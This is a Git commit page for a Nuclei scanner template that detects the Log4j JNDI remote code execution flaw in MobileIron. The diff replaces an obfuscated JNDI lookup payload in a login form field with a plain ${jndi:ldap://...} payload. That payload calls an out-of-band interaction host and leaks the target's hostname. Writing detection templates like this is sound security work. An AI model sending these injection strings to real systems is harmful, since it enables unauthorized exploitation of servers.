daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed mobileiron-log4j-jndi-rce (#4060)

patch-1
Sandeep Singh 2022-04-05 23:02:05 +05:30 committed by GitHub
parent ff6e4cda72
commit 3d15307605
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml
View File

@ -22,7 +22,7 @@ requests:
Referer: {{RootURL}}/mifs/user/login.jsp Referer: {{RootURL}}/mifs/user/login.jsp
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
j_username=${j${k8s:k5:-ND}i${sd:k5:-:}${lower:l}d${lower:a}${lower:p}://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&logincontext=employee
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -43,4 +43,4 @@ requests:
regex: regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by cs on 2022/02/28 # Enhanced by cs on 2022/02/28